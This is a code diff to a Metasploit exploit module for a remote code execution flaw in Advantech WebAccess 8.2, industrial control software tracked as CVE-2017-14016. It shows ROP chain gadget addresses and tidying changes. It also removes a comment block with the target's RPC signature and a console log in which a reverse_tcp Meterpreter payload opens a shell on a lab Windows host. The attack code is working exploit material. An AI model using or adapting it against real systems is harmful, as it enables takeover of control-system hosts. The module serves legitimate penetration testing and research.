@@ -23,7 +23,8 @@ def initialize(info = {})
2323 'References' =>
2424 [
2525 [ 'ZDI' , '17-938' ] ,
26- [ 'CVE' , '2017-14016' ]
26+ [ 'CVE' , '2017-14016' ] ,
27+ [ 'URL' , 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
2728 ] ,
2829 'Privileged' => true ,
2930 'DefaultOptions' =>
@@ -38,15 +39,15 @@ def initialize(info = {})
3839 'Platform' => 'win' ,
3940 'Targets' =>
4041 [
41- [ 'Advantech WebAccess 8.2-2017.03.31' ,
42+ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31' ,
4243 {
4344 'Ret' => 0x07036cdc , # pop ebx; add esp, 994; retn 0x14
4445 'Slide' => 0x07048f5b , # retn
4546 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04
4647 }
4748 ] ,
4849 ] ,
49- 'DisclosureDate' => 'Dec 25 2017' ,
50+ 'DisclosureDate' => 'Nov 02 2017' ,
5051 'DefaultTarget' => 0 ) )
5152 register_options ( [ Opt ::RPORT ( 4592 ) ] )
5253 end
@@ -66,9 +67,9 @@ def create_rop_chain()
6667 0xffffffff , # Value to negate, will become 0x00000001
6768 0x070467d2 , # NEG EAX # RETN [BwPAlarm.dll]
6869 0x0704de61 , # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
69- 0x41414141 , # Filler (compensate)
70- 0x41414141 , # Filler (compensate)
71- 0x41414141 , # Filler (compensate)
70+ rand_text_alpha ( 4 ) . unpack ( 'V' ) ,
71+ rand_text_alpha ( 4 ) . unpack ( 'V' ) ,
72+ rand_text_alpha ( 4 ) . unpack ( 'V' ) ,
7273 0x02030af7 , # POP EAX # RETN [BwKrlAPI.dll]
7374 0xfbdbcbd5 , # put delta into eax (-> put 0x00001000 into edx)
7475 0x02029003 , # ADD EAX,424442B # RETN [BwKrlAPI.dll]
@@ -78,8 +79,8 @@ def create_rop_chain()
7879 0x070467d2 , # NEG EAX # RETN [BwPAlarm.dll]
7980 0x07011e60 , # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
8081 0x0706fe66 , # POP EDI # RETN [BwPAlarm.dll]
81- 0x41414141 , # Filler (RETN offset compensation)
82- 0x41414141 , # Filler (RETN offset compensation)
82+ rand_text_alpha ( 4 ) . unpack ( 'V' ) ,
83+ rand_text_alpha ( 4 ) . unpack ( 'V' ) ,
8384 0x0703d825 , # RETN (ROP NOP) [BwPAlarm.dll]
8485 0x0202ca65 , # POP EAX # RETN [BwKrlAPI.dll]
8586 0x90909090 , # nop
@@ -132,48 +133,9 @@ def exploit
132133 begin
133134 dcerpc_call ( 0x1 , sploit )
134135 rescue Rex ::Proto ::DCERPC ::Exceptions ::NoResponse
136+ ensure
137+ disconnect
135138 end
136139 handler
137- disconnect
138140 end
139141end
140- =begin
141-
142- /* opcode: 0x01, address: 0x00401260 */
143-
144- void sub_401260 (
145- [in] handle_t arg_1,
146- [in] long arg_2,
147- [in] long arg_3,
148- [in] long arg_4,
149- [in][ref][size_is(arg_4)] char * arg_5,
150- [out][ref] long * arg_6
151- );
152-
153- saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc
154- [*] Processing scripts/advantech.rc for ERB directives.
155- resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_opcode_80061
156- resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
157- payload => windows/meterpreter/reverse_tcp
158- resource (scripts/advantech.rc)> set RHOST 172.16.175.145
159- RHOST => 172.16.175.145
160- resource (scripts/advantech.rc)> set LHOST 172.16.175.1
161- LHOST => 172.16.175.1
162- resource (scripts/advantech.rc)> exploit
163- [*] Started reverse TCP handler on 172.16.175.1:4444
164- [*] 172.16.175.145:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.145[4592] ...
165- [*] 172.16.175.145:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.145[4592] ...
166- [+] 172.16.175.145:4592 - Got a handle: 0x01d729e0
167- [*] 172.16.175.145:4592 - Trying target Advantech WebAccess <= 8.2...
168- [*] Sending stage (957487 bytes) to 172.16.175.145
169- [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.145:49351) at 2017-05-31 14:38:13 -0500
170- [*] 172.16.175.145:4592 - The DCERPC service did not reply to our request
171-
172- meterpreter > shell
173- Process 5208 created.
174- Channel 1 created.
175- Microsoft Windows [Version 6.1.7601]
176- Copyright (c) 2009 Microsoft Corporation. All rights reserved.
177-
178- C:\WebAccess\Node>
179- =end
0 commit comments